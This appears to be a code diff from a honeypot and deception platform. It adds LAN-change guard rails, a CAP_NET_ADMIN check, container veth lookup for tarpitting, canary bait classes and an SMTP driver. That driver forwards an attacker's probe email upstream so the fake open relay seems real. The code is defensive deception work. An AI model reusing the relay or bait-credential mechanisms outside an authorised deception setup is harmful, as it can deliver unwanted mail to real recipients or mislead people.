removed = sorted(set(old_services) - set(new_services))
if added or removed:
await _materialise_decky_services_diff(
repo, topology_id, decky_name, added, removed,
)
if forwards_l3_flipped:
# force was checked above; reaching here means the operator
# opted in. recreate_base re-renders compose first so the
# rebuilt base picks up the new `ports:` block.
await _materialise_decky_recreate_base(
repo, topology_id, decky_name,
)
await _assert_valid_after(repo, topology_id)
async def apply_update_lan(
repo: Any, topology_id: str, payload: dict[str, Any]
) -> None:
"""Update LAN fields — subnet, is_dmz, coords, rename."""
"""Update LAN fields — subnet, is_dmz, coords, rename.
Guard rail: ``subnet`` and ``is_dmz`` are pinned at deploy time.
Live deckies bind to the bridge with IPs allocated from the old
subnet (and ``is_dmz`` flips swap the bridge's ``internal=False``
flag, which docker can't change on a network with active
containers). Reject those mutations on active/degraded topologies
rather than rewriting the DB into an incoherent state.
Coord-only updates (``x``/``y``) are layout-only; let them through
unconditionally. Renames pass through too — the bridge's docker
name is keyed off ``_network_name(topology_id, lan_name)``, so a
rename would also need a rebuild — but rename isn't currently a
code path on active topologies; if the operator hits it we still
write the row and let the next deploy reconcile.
"""
hydrated = await _hydrated(repo, topology_id)
lan = _lan_by_name(hydrated, payload["name"])
if lan is None:
@@ -389,6 +1017,17 @@ async def apply_update_lan(
fields[key] = payload[key]
if not fields:
return
topology = await repo.get_topology(topology_id)
is_live = bool(topology) and topology.status in ("active", "degraded")
if is_live:
hostile = {"subnet", "is_dmz"} & fields.keys()
if hostile:
raise MutationError(
f"cannot change {sorted(hostile)} on a deployed LAN; "
f"teardown + redeploy required"
)
await repo.update_lan(lan["id"], fields)
await _assert_valid_after(repo, topology_id)

View File

@@ -303,11 +303,44 @@ def remove_bridge_network(client: docker.DockerClient, name: str) -> None:
# Host-side macvlan interface (hairpin fix)
# ---------------------------------------------------------------------------
def _require_root() -> None:
if os.geteuid() != 0:
raise PermissionError(
"MACVLAN host-side interface setup requires root. Run with sudo."
)
# Linux capability bit positions — see capabilities(7).
_CAP_NET_ADMIN = 12
def _has_cap_net_admin() -> bool:
"""True if the current process holds CAP_NET_ADMIN in its effective set.
Reads ``/proc/self/status`` rather than calling ``capget(2)`` so we
don't need a libcap dependency. ``CapEff`` is a 64-bit hex bitmask;
bit 12 is CAP_NET_ADMIN.
"""
try:
with open("/proc/self/status", "r") as fh:
for line in fh:
if line.startswith("CapEff:"):
bits = int(line.split()[1], 16)
return bool(bits & (1 << _CAP_NET_ADMIN))
except OSError:
pass
return False
def _require_net_admin() -> None:
"""Reject early if the process can't run ``ip link add ... macvlan``.
CAP_NET_ADMIN is what the kernel actually checks for netlink RTM_NEWLINK
of a macvlan/ipvlan slave; euid==0 is sufficient (it grants every cap)
but not necessary. Prefer the cap check so the systemd unit's
``AmbientCapabilities=CAP_NET_ADMIN`` is honoured without forcing the
whole API to run as root.
"""
if os.geteuid() == 0 or _has_cap_net_admin():
return
raise PermissionError(
"MACVLAN host-side interface setup needs CAP_NET_ADMIN. "
"Either run as root or grant the cap (systemd: "
"AmbientCapabilities=CAP_NET_ADMIN)."
)
def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
@@ -317,7 +350,9 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
host-helper first: the two drivers can share a parent NIC on paper but
leaving the opposite helper in place is just cruft after a driver swap.
"""
_require_root()
_require_net_admin()
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
@@ -332,7 +367,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
def teardown_host_macvlan(decky_ip_range: str) -> None:
_require_root()
_require_net_admin()
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
@@ -344,7 +379,9 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
host-helper first so a prior macvlan deploy doesn't leave its slave
dangling on the parent NIC after the driver swap.
"""
_require_root()
_require_net_admin()
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
@@ -358,7 +395,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
def teardown_host_ipvlan(decky_ip_range: str) -> None:
_require_root()
_require_net_admin()
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
@@ -378,3 +415,47 @@ def ips_to_range(ips: list[str]) -> str:
strict=False,
)
return str(network)
# ---------------------------------------------------------------------------
# Container veth resolution (for tc netem tarpit)
# ---------------------------------------------------------------------------
def get_container_pid(container_name: str) -> int:
"""Return the PID of a running container's init process."""
client = docker.from_env()
try:
container = client.containers.get(container_name)
except docker.errors.NotFound:
raise LookupError(f"container {container_name!r} not found")
pid = container.attrs["State"]["Pid"]
if not pid:
raise LookupError(f"container {container_name!r} is not running (PID=0)")
return pid
def get_container_veth(container_name: str) -> str:
"""Return the host veth interface name paired to container_name's eth0.
Reads /sys/class/net/eth0/iflink from inside the container to get the
peer interface index, then matches it against ``ip link show`` on the host.
Requires no nsenter and no elevated privileges beyond what Docker exec grants.
"""
result = _run(
["docker", "exec", container_name, "cat", "/sys/class/net/eth0/iflink"],
check=False,
)
if result.returncode != 0:
raise LookupError(
f"container {container_name!r} not reachable: {result.stderr.strip()}"
)
peer_index = result.stdout.strip()
links = _run(["ip", "link", "show"])
for line in links.stdout.splitlines():
if line.startswith(f"{peer_index}:"):
# Format: "42: veth3a4b5c@if41: <BROADCAST,...>"
iface = line.split(":")[1].strip().split("@")[0]
return iface
raise LookupError(
f"no host veth found for container {container_name!r} (peer ifindex {peer_index})"
)

View File

@@ -0,0 +1,80 @@
"""SMTP probe-relay driver.
Forwards the attacker's first probe email via the master's real internet
connection. The smtp_relay decky runs on MACVLAN and has no gateway access;
the master (where this worker runs) does.
Called by the realism worker's smtp probe listener, not the main tick loop.
"""
from __future__ import annotations
import email
import smtplib
from pathlib import Path
from typing import Any
_ARTIFACTS_ROOT_DEFAULT = "/var/lib/decnet/artifacts"
def _ensure_from_header(body: bytes, mail_from: str) -> bytes:
"""Return body with a From: header added if one is absent."""
try:
msg = email.message_from_bytes(body)
except Exception:
return body
if msg["From"]:
return body
# Prepend the header before the existing content.
header_line = f"From: {mail_from}\r\n".encode()
return header_line + body
def forward_probe(
*,
svc_cfg: dict[str, Any],
stored_as: str,
decky_name: str,
mail_from: str,
rcpt_to: list[str],
artifacts_root: str = _ARTIFACTS_ROOT_DEFAULT,
) -> tuple[bool, str]:
"""Read the .eml from disk and forward it via the upstream relay.
Returns (True, "") on success or (False, reason) on failure.
Always safe to call in a thread — uses only blocking I/O.
"""
upstream_host = (svc_cfg.get("upstream_host") or "").strip()
if not upstream_host:
return False, "upstream_host not configured"
eml_path = Path(artifacts_root) / decky_name / "smtp" / stored_as
try:
body = eml_path.read_bytes()
except OSError as exc:
return False, f"cannot read eml: {exc}"
if not rcpt_to:
return False, "no recipients"
upstream_port = int(svc_cfg.get("upstream_port") or 25)
upstream_user = (svc_cfg.get("upstream_user") or "").strip()
upstream_pass = (svc_cfg.get("upstream_pass") or "").strip()
envelope_from = (svc_cfg.get("upstream_sender") or "").strip() or mail_from
# Ensure the message has a From: header so mail clients show the attacker's
# address rather than falling back to the envelope sender (upstream_sender).
# Minimal relay-test scripts often omit headers entirely.
body = _ensure_from_header(body, mail_from)
try:
with smtplib.SMTP(upstream_host, upstream_port, timeout=15) as conn:
conn.ehlo()
if conn.has_extn("STARTTLS"):
conn.starttls()
conn.ehlo()
if upstream_user and upstream_pass:
conn.login(upstream_user, upstream_pass)
conn.sendmail(envelope_from, rcpt_to, body)
return True, ""
except Exception as exc:
return False, str(exc)[:256]

View File

@@ -18,11 +18,8 @@ or IP can't escape into a shell.
from __future__ import annotations
import asyncio
import shlex
from typing import Any
import base64
from datetime import datetime, timezone
from datetime import datetime
from decnet.logging import get_logger
from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
@@ -226,36 +223,24 @@ class SSHDriver(ActivityDriver):
) -> ActivityResult:
"""Write *content* to *path* inside *decky_name*'s ssh container.
Streams base64 via stdin (mirrors :mod:`decnet.canary.planter`'s
ARG_MAX-safe write — see commit c17b9e0). Sets file mode and,
when *mtime* is provided, ``touch -d`` to backdate the file so
it doesn't all stamp at wall-clock-now (the realism failure
this migration is fixing).
Delegates to :func:`decnet.decky_io.write_file_to_container`,
which carries the ARG_MAX-safe base64-via-stdin trick. Sets
file mode and, when *mtime* is provided, ``touch -d`` to
backdate the file (otherwise everything stamps at wall-clock-now
— the realism failure this path was originally fixing).
"""
from decnet.decky_io import write_file_to_container
container = _container_for(decky_name)
b64 = base64.b64encode(content).decode("ascii")
# touch -d accepts ISO 8601; we always emit UTC so the
# container's local TZ doesn't drift the mtime.
if mtime is not None:
ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
touch_cmd = f"touch -d {shlex.quote(ts)} {shlex.quote(path)}"
else:
touch_cmd = f"touch {shlex.quote(path)}"
sh_cmd = (
f"mkdir -p {shlex.quote(_dirname(path))} && "
f"base64 -d > {shlex.quote(path)} && "
f"chmod {mode:o} {shlex.quote(path)} && "
f"{touch_cmd}"
success, error = await write_file_to_container(
container, path, content, mode=mode, mtime=mtime, timeout=_TIMEOUT,
)
argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run_with_stdin(argv, b64.encode("ascii"))
success = rc == 0
payload: dict[str, Any] = {
"dst_decky": decky_name,
"path": path,
"bytes": len(content),
"rc": rc,
"stderr": stderr.strip()[:256] if not success else None,
"rc": 0 if success else 1,
"stderr": error if not success else None,
}
return ActivityResult(success=success, payload=payload)
@@ -283,11 +268,3 @@ class SSHDriver(ActivityDriver):
)
def _dirname(path: str) -> str:
"""Pure-string dirname. We can't trust ``os.path.dirname`` on the
host to share the destination container's separator semantics, but
deckies are POSIX so a plain ``rfind('/')`` suffices."""
idx = path.rfind("/")
if idx <= 0:
return "/"
return path[:idx]

View File

@@ -175,7 +175,7 @@ async def pick(
)
return None
active = [p for p in personas if in_active_hours(p, now_dt.hour)]
active = [p for p in personas if in_active_hours(p, now_dt)]
if len(active) < 2:
logger.debug(
"emailgen pick: source=%s mail_decky=%s only %d personas in-hours",

View File

@@ -25,6 +25,7 @@ import secrets
from datetime import datetime, timezone
from typing import Any, Optional
from decnet.bus import topics as _topics
from decnet.bus.factory import get_bus
from decnet.bus.publish import (
publish_safely,
@@ -34,6 +35,7 @@ from decnet.bus.publish import (
from decnet.logging import get_logger
from decnet.orchestrator import events, scheduler
from decnet.orchestrator.drivers import get_driver_for
from decnet.orchestrator.drivers.smtp_relay import forward_probe
from decnet.orchestrator.emailgen import (
events as email_events,
scheduler as email_scheduler,
@@ -138,6 +140,9 @@ async def orchestrator_worker(
control_task = asyncio.create_task(
run_control_listener(bus, "orchestrator", shutdown),
)
probe_task = asyncio.create_task(
_run_smtp_probe_listener(repo, shutdown),
)
tick_n = 0
try:
while not shutdown.is_set():
@@ -157,7 +162,7 @@ async def orchestrator_worker(
if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
await _refresh_realism_config(repo)
finally:
for t in (heartbeat_task, control_task):
for t in (heartbeat_task, control_task, probe_task):
t.cancel()
with contextlib.suppress(Exception, asyncio.CancelledError):
await t
@@ -467,6 +472,100 @@ async def _bump_synthetic_file_after_edit(repo, action, result) -> None:
await repo.update_synthetic_file(action.synthetic_file_uuid, patch)
async def _run_smtp_probe_listener(
repo: BaseRepository,
shutdown: asyncio.Event,
) -> None:
"""Subscribe to smtp.probe.pending and forward probe emails upstream.
Runs as a long-lived subtask alongside the tick loop. When a probe lands
we check if this (attacker_ip, decky) has already been forwarded up to
probe_limit times — if not, forward via the master's real internet
connection and store a probe_relay bounty with the result.
"""
try:
bus = get_bus(client_name="orchestrator-probe")
await bus.connect()
sub = bus.subscribe(_topics.smtp("probe.pending"))
async with sub:
async for event in sub:
if shutdown.is_set():
break
try:
await _handle_probe_pending(repo, event.payload)
except Exception as exc: # noqa: BLE001
logger.warning("smtp probe listener: handle error: %s", exc)
except asyncio.CancelledError:
raise
except Exception as exc: # noqa: BLE001
logger.warning("smtp probe listener: bus unavailable: %s", exc)
finally:
with contextlib.suppress(Exception):
await bus.close()
async def _handle_probe_pending(repo: BaseRepository, payload: dict) -> None:
decky_name = (payload.get("decky") or "").strip()
attacker_ip = (payload.get("attacker_ip") or "").strip()
stored_as = (payload.get("stored_as") or "").strip()
mail_from = (payload.get("mail_from") or "").strip()
rcpt_to_raw = (payload.get("rcpt_to") or "").strip()
if not (decky_name and attacker_ip and stored_as):
return
decky_row = await repo.get_fleet_decky_by_name(decky_name)
if not decky_row:
return
svc_cfg = (
(decky_row.get("decky_config") or {})
.get("service_config", {})
.get("smtp_relay") or {}
)
if not (svc_cfg.get("upstream_host") or "").strip():
return
probe_limit = int(svc_cfg.get("probe_limit") or 1)
already_sent = await repo.count_probe_relays(attacker_ip, decky_name)
if already_sent >= probe_limit:
return
rcpt_to = [r.strip() for r in rcpt_to_raw.split(",") if r.strip()]
artifacts_root = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
loop = asyncio.get_event_loop()
ok, reason = await loop.run_in_executor(
None,
lambda: forward_probe(
svc_cfg=svc_cfg,
stored_as=stored_as,
decky_name=decky_name,
mail_from=mail_from,
rcpt_to=rcpt_to,
artifacts_root=artifacts_root,
),
)
await repo.add_bounty({
"decky": decky_name,
"service": "smtp_relay",
"attacker_ip": attacker_ip,
"bounty_type": "probe_relay",
"payload": {
"stored_as": stored_as,
"forwarded": ok,
**({"fwd_error": reason} if not ok else {}),
},
})
if ok:
logger.info("smtp probe forwarded decky=%s ip=%s", decky_name, attacker_ip)
else:
logger.warning(
"smtp probe forward failed decky=%s ip=%s error=%s",
decky_name, attacker_ip, reason,
)
async def _record_synthetic_file(repo, action) -> None:
"""Persist (or patch) a synthetic_files row after a FileAction plant.

View File

@@ -25,11 +25,14 @@ from __future__ import annotations
import asyncio
import secrets
from datetime import datetime, timezone
from typing import Callable, Optional
from typing import TYPE_CHECKING, Callable, Optional
from decnet.logging import get_logger
from decnet.realism.taxonomy import ContentClass
if TYPE_CHECKING:
from decnet.realism.personas import EmailPersona
log = get_logger("realism.bodies")
@@ -205,6 +208,9 @@ _BODIES: dict[ContentClass, Callable[[str, secrets.SystemRandom], str]] = {
ContentClass.LOG_DAEMON: _body_log_daemon,
ContentClass.CACHE_TMP: _body_cache_tmp,
ContentClass.EMAIL: _body_email,
# All canary classes share one placeholder — content-class discriminant is the
# "what"; the real payload (token slug, DNS hook URL) is injected by the canary
# cultivator. Do not replace with distinct generators without updating cultivator.
ContentClass.CANARY_AWS_CREDS: _body_canary,
ContentClass.CANARY_ENV_FILE: _body_canary,
ContentClass.CANARY_GIT_CONFIG: _body_canary,
@@ -213,6 +219,8 @@ _BODIES: dict[ContentClass, Callable[[str, secrets.SystemRandom], str]] = {
ContentClass.CANARY_HONEYDOC_DOCX: _body_canary,
ContentClass.CANARY_HONEYDOC_PDF: _body_canary,
ContentClass.CANARY_MYSQL_DUMP: _body_canary,
ContentClass.CANARY_FINGERPRINT_HTML: _body_canary,
ContentClass.CANARY_FINGERPRINT_SVG: _body_canary,
}
@@ -240,7 +248,7 @@ def make_body(
async def make_body_with_llm(
content_class: ContentClass,
persona, # EmailPersona — typed loosely to avoid an import cycle
persona: "EmailPersona",
*,
llm=None, # LLMBackend | None
breaker=None, # LLMCircuitBreaker | None

View File

@@ -38,7 +38,7 @@ def _parse_window(window: str) -> tuple[int, int, int, int] | None:
Returns ``None`` for malformed input — callers treat that as
"always-on" so a single config typo never silences the whole fleet
(mirrors :func:`decnet.realism.personas.in_active_hours` semantics).
(:func:`decnet.realism.personas.in_active_hours` delegates here).
"""
try:
start_s, end_s = window.split("-")

View File

@@ -38,7 +38,7 @@ class FakeBackend(LLMBackend):
)
self._success = success
async def generate(self, prompt: str) -> LLMResult: # noqa: ARG002
async def generate(self, _prompt: str) -> LLMResult:
t0 = time.monotonic()
latency_ms = int((time.monotonic() - t0) * 1000)
return LLMResult(

View File

@@ -159,6 +159,8 @@ _NAMERS: dict[ContentClass, Callable[[str, secrets.SystemRandom], str]] = {
ContentClass.CANARY_HONEYDOC_DOCX: _name_canary,
ContentClass.CANARY_HONEYDOC_PDF: _name_canary,
ContentClass.CANARY_MYSQL_DUMP: _name_canary,
ContentClass.CANARY_FINGERPRINT_HTML: _name_canary,
ContentClass.CANARY_FINGERPRINT_SVG: _name_canary,
}

View File

@@ -19,11 +19,13 @@ not stall the entire realism tick.
from __future__ import annotations
import json
from datetime import datetime
from typing import Literal, Optional
from pydantic import BaseModel, Field, ValidationError, field_validator, model_validator
from decnet.logging import get_logger
from decnet.realism.diurnal import in_work_hours
logger = get_logger("realism.personas")
@@ -132,22 +134,10 @@ def login_for(persona: str) -> str:
return "user"
def in_active_hours(persona: EmailPersona, now_hour: int) -> bool:
"""Return True if *now_hour* (023) falls in the persona's window.
def in_active_hours(persona: EmailPersona, now: datetime) -> bool:
"""Return True if *now* falls in the persona's active-hours window.
Format: ``"HH:MM-HH:MM"``. Wrap-around windows (``"22:00-06:00"``)
are supported. Invalid windows treat the persona as always-on so a
config typo never silences the whole fleet.
Delegates to :func:`decnet.realism.diurnal.in_work_hours` so minute
precision is preserved (``"09:30-17:45"`` is honoured correctly).
"""
try:
start_s, end_s = persona.active_hours.split("-")
start_h = int(start_s.split(":")[0])
end_h = int(end_s.split(":")[0])
except (ValueError, IndexError):
return True
if start_h == end_h:
return True
if start_h < end_h:
return start_h <= now_hour < end_h
# Wrap-around (e.g. 22:00-06:00).
return now_hour >= start_h or now_hour < end_h
return in_work_hours(persona.active_hours, now)

View File

@@ -120,11 +120,19 @@ def load(*, language_default: str = "en") -> list[EmailPersona]:
logger.warning("realism global pool: read failed path=%s: %s", path, exc)
return []
# Re-stat after the read so the stored mtime reflects what we actually
# parsed — a file change between the initial stat and read would otherwise
# cache a stale mtime and suppress the next reload.
try:
st2 = path.stat()
except OSError:
st2 = st
parsed = parse_personas(raw, language_default=language_default)
with _lock:
_cache = parsed
_cache_path = path
_cache_mtime = st.st_mtime
_cache_mtime = st2.st_mtime
if parsed:
logger.info(
"realism global pool: loaded %d personas from %s", len(parsed), path,

View File

@@ -20,6 +20,7 @@ persona outside its window is never considered.
from __future__ import annotations
import secrets
import threading
from datetime import datetime
from typing import Any, Optional, Sequence
@@ -62,6 +63,8 @@ _DEFAULT_CANARY_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = (
(ContentClass.CANARY_HONEYDOC_DOCX, 1),
(ContentClass.CANARY_HONEYDOC_PDF, 1),
(ContentClass.CANARY_MYSQL_DUMP, 1),
(ContentClass.CANARY_FINGERPRINT_HTML, 1),
(ContentClass.CANARY_FINGERPRINT_SVG, 1),
)
_DEFAULT_CANARY_PROBABILITY = 0.03
@@ -72,6 +75,7 @@ _USER_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_USER_CLASS_
_SYSTEM_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_SYSTEM_CLASS_WEIGHTS
_CANARY_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_CANARY_CLASS_WEIGHTS
_CANARY_PROBABILITY: float = _DEFAULT_CANARY_PROBABILITY
_planner_lock = threading.Lock()
def _serialize_weights(
@@ -82,12 +86,15 @@ def _serialize_weights(
def _parse_weights(
raw: Any, allowed: set[ContentClass],
) -> tuple[tuple[ContentClass, int], ...]:
) -> tuple[tuple[tuple[ContentClass, int], ...], list[str]]:
"""Parse ``[{"content_class": "...", "weight": N}, ...]`` into the
planner's internal tuple shape. Drops entries whose ``content_class``
isn't in *allowed* (defends against an operator pasting in a canary
class on the user list, which would skew sampling without the
canary-probability gate).
planner's internal tuple shape.
Returns ``(weights, dropped)`` where *dropped* is the list of
``content_class`` values that were valid enum members but not in
*allowed* (e.g. a canary class pasted onto the user list). Callers
surface *dropped* in the API response so the operator can see the
entry didn't land without having to re-read the config.
Raises ``ValueError`` on structural problems (non-list, non-int
weight, negative weight, empty result) so the API can return 400.
@@ -95,6 +102,7 @@ def _parse_weights(
if not isinstance(raw, list):
raise ValueError("weights must be a list")
out: list[tuple[ContentClass, int]] = []
dropped: list[str] = []
for entry in raw:
if not isinstance(entry, dict):
raise ValueError("each weight entry must be an object")
@@ -111,18 +119,14 @@ def _parse_weights(
except (ValueError, TypeError):
raise ValueError(f"unknown content_class: {cls_name!r}")
if cls not in allowed:
# Silently drop — a class that doesn't belong on this list
# (e.g. a canary class on the user list) is operator error,
# but we don't want to fail the whole save over one stray
# entry. The roundtrip in current_payload() will show the
# operator their entry didn't land.
dropped.append(cls.value)
continue
out.append((cls, weight))
if not out:
raise ValueError("weights list resolved to zero valid entries")
if sum(w for _, w in out) <= 0:
raise ValueError("weights must sum to a positive number")
return tuple(out)
return tuple(out), dropped
_USER_CLASSES: set[ContentClass] = {
@@ -136,6 +140,7 @@ _CANARY_CLASSES: set[ContentClass] = {
ContentClass.CANARY_GIT_CONFIG, ContentClass.CANARY_SSH_KEY,
ContentClass.CANARY_HONEYDOC, ContentClass.CANARY_HONEYDOC_DOCX,
ContentClass.CANARY_HONEYDOC_PDF, ContentClass.CANARY_MYSQL_DUMP,
ContentClass.CANARY_FINGERPRINT_HTML, ContentClass.CANARY_FINGERPRINT_SVG,
}
@@ -151,15 +156,21 @@ def current_payload() -> dict[str, Any]:
}
def apply_payload(payload: dict[str, Any]) -> None:
def apply_payload(payload: dict[str, Any]) -> list[str]:
"""Override the planner's live globals from a wire payload.
Validates structurally and rebinds module-level names atomically
per field — partial failures don't leave the planner in a torn
state because validation happens before any rebind.
Returns the list of ``content_class`` values that were dropped
because they didn't belong on their target list (e.g. a canary
class on the user list). Callers should surface this in the API
response so operators know their entry didn't land.
Unknown fields are ignored (forward-compat); fields not present
leave the corresponding global untouched."""
leave the corresponding global untouched.
"""
global _USER_CLASS_WEIGHTS, _SYSTEM_CLASS_WEIGHTS
global _CANARY_CLASS_WEIGHTS, _CANARY_PROBABILITY
@@ -167,37 +178,45 @@ def apply_payload(payload: dict[str, Any]) -> None:
new_system = _SYSTEM_CLASS_WEIGHTS
new_canary = _CANARY_CLASS_WEIGHTS
new_prob = _CANARY_PROBABILITY
all_dropped: list[str] = []
if "user_class_weights" in payload:
new_user = _parse_weights(payload["user_class_weights"], _USER_CLASSES)
new_user, dropped = _parse_weights(payload["user_class_weights"], _USER_CLASSES)
all_dropped.extend(dropped)
if "system_class_weights" in payload:
new_system = _parse_weights(
new_system, dropped = _parse_weights(
payload["system_class_weights"], _SYSTEM_CLASSES,
)
all_dropped.extend(dropped)
if "canary_class_weights" in payload:
new_canary = _parse_weights(
new_canary, dropped = _parse_weights(
payload["canary_class_weights"], _CANARY_CLASSES,
)
all_dropped.extend(dropped)
if "canary_probability" in payload:
prob = payload["canary_probability"]
if not isinstance(prob, (int, float)) or not (0.0 <= prob <= 1.0):
raise ValueError("canary_probability must be in [0.0, 1.0]")
new_prob = float(prob)
_USER_CLASS_WEIGHTS = new_user
_SYSTEM_CLASS_WEIGHTS = new_system
_CANARY_CLASS_WEIGHTS = new_canary
_CANARY_PROBABILITY = new_prob
with _planner_lock:
_USER_CLASS_WEIGHTS = new_user
_SYSTEM_CLASS_WEIGHTS = new_system
_CANARY_CLASS_WEIGHTS = new_canary
_CANARY_PROBABILITY = new_prob
return all_dropped
def reset_to_defaults() -> None:
"""Restore hardcoded defaults. Used by tests and the API reset path."""
global _USER_CLASS_WEIGHTS, _SYSTEM_CLASS_WEIGHTS
global _CANARY_CLASS_WEIGHTS, _CANARY_PROBABILITY
_USER_CLASS_WEIGHTS = _DEFAULT_USER_CLASS_WEIGHTS
_SYSTEM_CLASS_WEIGHTS = _DEFAULT_SYSTEM_CLASS_WEIGHTS
_CANARY_CLASS_WEIGHTS = _DEFAULT_CANARY_CLASS_WEIGHTS
_CANARY_PROBABILITY = _DEFAULT_CANARY_PROBABILITY
with _planner_lock:
_USER_CLASS_WEIGHTS = _DEFAULT_USER_CLASS_WEIGHTS
_SYSTEM_CLASS_WEIGHTS = _DEFAULT_SYSTEM_CLASS_WEIGHTS
_CANARY_CLASS_WEIGHTS = _DEFAULT_CANARY_CLASS_WEIGHTS
_CANARY_PROBABILITY = _DEFAULT_CANARY_PROBABILITY
def _weighted_pick(

View File

@@ -62,6 +62,8 @@ class ContentClass(StrEnum):
CANARY_HONEYDOC_DOCX = "canary_honeydoc_docx"
CANARY_HONEYDOC_PDF = "canary_honeydoc_pdf"
CANARY_MYSQL_DUMP = "canary_mysql_dump"
CANARY_FINGERPRINT_HTML = "canary_fingerprint_html"
CANARY_FINGERPRINT_SVG = "canary_fingerprint_svg"
def is_canary(self) -> bool:
return self.value.startswith("canary_")

View File

@@ -1,5 +1,47 @@
import base64
import binascii
from abc import ABC, abstractmethod
from dataclasses import asdict, dataclass
from pathlib import Path
from typing import Any, Literal
# Sentinel prefix used by the deploy wizard to ship multi-line textarea values
# through ConfigParser without relying on its multi-line continuation syntax.
# Plain raw values without the prefix are accepted as-is so direct API
# submitters (PUT /…/services/{svc}/config) keep working with raw strings.
TEXTAREA_B64_PREFIX = "b64:"
FieldType = Literal["string", "password", "int", "bool", "textarea", "enum"]
@dataclass(frozen=True)
class ServiceConfigField:
"""
Declarative descriptor for one user-editable knob on a service.
The Inspector form (Fleet + MazeNET) renders inputs from this metadata,
and BaseService.validate_cfg coerces submitted values against it.
"""
key: str
label: str
type: FieldType = "string"
default: Any = None
secret: bool = False
help: str | None = None
enum: list[str] | None = None
placeholder: str | None = None
def to_json(self) -> dict:
d = asdict(self)
# Frontend doesn't need a None enum dangling on non-enum fields
if self.enum is None:
d.pop("enum", None)
return d
class ConfigValidationError(ValueError):
"""Raised when a submitted service_cfg value cannot be coerced to its declared type."""
class BaseService(ABC):
@@ -15,6 +57,10 @@ class BaseService(ABC):
default_image: str # Docker image tag, or "build" if a Dockerfile is needed
fleet_singleton: bool = False # True = runs once fleet-wide, not per-decky
# Per-service customizable fields exposed to the Inspector UI.
# Subclasses override; default empty -> "No customizable fields".
config_schema: list[ServiceConfigField] = []
@abstractmethod
def compose_fragment(
self,
@@ -41,3 +87,63 @@ class BaseService(ABC):
image built. Return None if default_image is used directly.
"""
return None
def validate_cfg(self, cfg: dict | None) -> dict:
"""
Coerce a user-submitted dict against this service's config_schema.
Unknown keys are silently dropped. Declared keys are coerced to their
declared type (raising ConfigValidationError on bad values). Empty
strings on optional fields drop the key entirely so compose_fragment's
existing `if "X" in cfg` guards keep working.
"""
out: dict[str, Any] = {}
if not cfg:
return out
by_key = {f.key: f for f in self.config_schema}
for key, raw in cfg.items():
spec = by_key.get(key)
if spec is None:
continue # drop unknown keys
if raw is None or raw == "":
continue
out[key] = _coerce(spec, raw)
return out
def _coerce(spec: ServiceConfigField, raw: Any) -> Any:
t = spec.type
if t in ("string", "password"):
return str(raw)
if t == "textarea":
s = str(raw)
if s.startswith(TEXTAREA_B64_PREFIX):
try:
return base64.b64decode(s[len(TEXTAREA_B64_PREFIX):], validate=True).decode("utf-8")
except (binascii.Error, UnicodeDecodeError) as e:
raise ConfigValidationError(
f"{spec.key}: malformed {TEXTAREA_B64_PREFIX} payload"
) from e
return s
if t == "int":
try:
return int(raw)
except (TypeError, ValueError) as e:
raise ConfigValidationError(f"{spec.key}: expected int, got {raw!r}") from e
if t == "bool":
if isinstance(raw, bool):
return raw
if isinstance(raw, str):
if raw.lower() in ("true", "1", "yes", "on"):
return True
if raw.lower() in ("false", "0", "no", "off"):
return False
raise ConfigValidationError(f"{spec.key}: expected bool, got {raw!r}")
if t == "enum":
s = str(raw)
if spec.enum and s not in spec.enum:
raise ConfigValidationError(
f"{spec.key}: {s!r} not in allowed values {spec.enum}"
)
return s
raise ConfigValidationError(f"{spec.key}: unknown field type {t!r}")

View File

@@ -12,6 +12,7 @@ class ConpotService(BaseService):
name = "conpot"
ports = [502, 161, 80]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
env = {

View File

@@ -8,6 +8,7 @@ class DockerAPIService(BaseService):
name = "docker_api"
ports = [2375, 2376]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -9,6 +9,7 @@ class ElasticsearchService(BaseService):
name = "elasticsearch"
ports = [9200]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -8,6 +8,7 @@ class FTPService(BaseService):
name = "ftp"
ports = [21]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -1,6 +1,6 @@
import json
from pathlib import Path
from decnet.services.base import BaseService
from decnet.services.base import BaseService, ServiceConfigField
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "http"
@@ -10,6 +10,41 @@ class HTTPService(BaseService):
ports = [80, 443]
default_image = "build"
config_schema = [
